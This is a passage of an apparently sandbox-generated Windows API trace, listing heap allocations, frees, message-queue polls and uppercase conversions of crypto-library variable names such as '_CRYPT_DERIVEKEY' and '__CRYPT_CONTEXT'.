dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0200.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0200.398] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0200.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0200.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0200.398] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0200.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0200.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0200.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0200.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0200.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0200.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0200.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0200.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0200.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0200.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0200.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0200.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0200.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0200.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0200.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0200.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0200.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0200.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0200.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0200.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0200.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0200.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0200.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0200.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0200.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0200.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0200.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0200.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0200.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0200.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0200.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0200.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0200.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0200.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0200.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0200.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0200.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0200.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0200.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0200.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0200.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0200.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0200.400] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0200.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0200.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0200.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0200.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0200.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0200.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0200.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0200.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0200.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0200.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0200.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0200.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0200.400] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0200.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0200.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0200.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0200.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0200.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0200.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0200.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0200.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0200.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0200.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0200.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0200.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0200.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0200.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0200.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0200.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0200.401] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0200.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0200.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0200.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0200.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0200.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0200.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0200.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0200.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0200.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0200.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0200.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0200.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0200.401] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0200.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0200.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0200.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0200.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0200.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0200.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0200.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0200.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0200.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0200.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0200.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0200.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0200.402] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0200.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0200.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0200.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0200.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0200.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0200.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0200.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0200.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0200.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0200.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0200.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0200.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0200.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0200.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0200.403] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0200.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0200.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0200.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0200.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0200.403] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0200.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0200.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0200.403] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0200.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0200.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0200.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0200.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0200.403] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0200.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0200.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0200.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0200.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0200.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0200.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0200.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0200.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0200.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0200.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0200.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0200.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0200.404] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0200.404] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0200.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0200.404] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0200.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0200.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0200.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0200.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0200.404] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0200.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0200.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0200.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0200.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0200.404] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0200.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0200.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0200.404] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0200.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0200.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0200.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0200.404] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0200.404] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0200.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0200.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0200.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0200.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0200.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0200.405] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0200.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0200.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0200.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0200.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0200.405] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0200.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0200.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0200.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0200.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0200.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0200.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0200.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0200.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0200.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0200.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0200.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0200.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0200.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0200.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0200.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0200.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0200.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0200.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0200.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0200.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0200.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0200.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0200.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0200.406] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0200.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0200.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0200.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c80 [0200.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0200.406] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0200.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0200.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0200.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0200.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0200.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0200.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0200.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0200.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0200.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0200.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0200.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0200.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0200.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0200.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0200.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0200.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0200.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0200.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0200.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0200.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 